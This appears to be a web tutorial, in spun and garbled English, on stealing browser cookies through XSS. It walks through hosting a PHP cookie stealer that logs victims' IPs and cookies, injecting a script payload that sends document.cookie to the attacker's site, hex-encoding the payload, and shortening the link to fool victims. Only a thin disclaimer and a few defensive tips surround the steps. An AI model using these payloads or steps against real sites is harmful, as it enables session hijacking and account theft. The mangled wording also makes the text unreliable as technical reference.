if anyone, tries these online hackers against any company or
whatever that creates him to trespass the safety actions and delivers him under
the lawful justice. This guide is ideal for the enhancement of security and for
PenTesting, research by lawful security
organizations.
Requirements:
A cookie Stealer value : Get it from here
Free Web web host service
Basic Information about XSS
Basic Information about Pc Cookies
Cookie taking is the procedure of taking advantage of the
XSS weeknesses (Non-persistent/persistent) and grab the cookie from the
sufferer who check out the contaminated weblink. These cookie will be used to
bargain their records.
Step 1: Developing Cookie Stealer PHP file
Get the Cookie stealer from the weblink i described. In that publish, i have described three
editions of cookie stealer. We are going
to use the third edition.
Copy the value.
Open Note pad and insert the code
Save the information file with .php extension
Eg: Stealer.php
Now make New information file and preserve it as log.txt
(leave it as blank). Don't modify the name , this is the filename what we give
up php information file.
Now you will have two files;
1. Stealer.php
2. log.txt
What these two information files do exactly?
The above Stealer.php information file get ip deal
with,cookie and shops the information in log.txt information file.
The log.txt has cookies , ip deal with information.
Step 2:
Register in a 100 % free web-hosting assistance and sign in
into your cpanel.
Now start the File Administrator in cpanel.
Upload the Stealer.php and log.txt to main directory or
public_html directory.
Now the stealer will be at
hxxp://www.YourSite.com/Stealer.php .
Step 3: Exploiting the XSS Vulnerability
So Far , we have pointed our saw. Now we are going to use it.
Once you set up everything and discover a Insecure
website,then provide the following value in the Insecure websites.
<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href
= 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
Cookie Stealing with Non-Persistent vs Chronic XSS:
Persistent: if you provide this value in Chronic XSS
vulnerable website, it will be there permanently until administration discover
it. It will be proven to all
customers. So assailants don't need to
deliver any weblink to others. Whoever
visitthe web page, they will be vicim.
Non-Persistent:
In situation of Non-persistent strike, enemy will deliver
the weblink to sufferers. Whenever they check the site, it will grab the cookie. Most of websites are susceptible to
Non-persistent XSS .
In Non-persistence, Attackers will deliver the treated
weblink sufferers.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href
= 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
The above weblink is clearly reveals the programs. Hackers can Hex-encode this program so that sufferer can't see the program.
For Example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still , the weblink look lengthy. The enemy use one more
technique to cover up the lengthy url i.e url reducing websites. There are lot
of websites that reduce the lengthy url into small url.
For example:
hxxp://www.tinyexample.com/twrwd63
Once the sufferer check the site, his cookie will be saved
in log.txt information file.
How to be Protected from this attack?
Use No-Script Add-on. This is best security to keep away
from XSS
Never Simply select the Shorten url
Sometime you may want to adhere to the reduce weblink. If so, then obvious all cookies in your web
browser and check out through Proxies or VPN(it will cover up your ip.
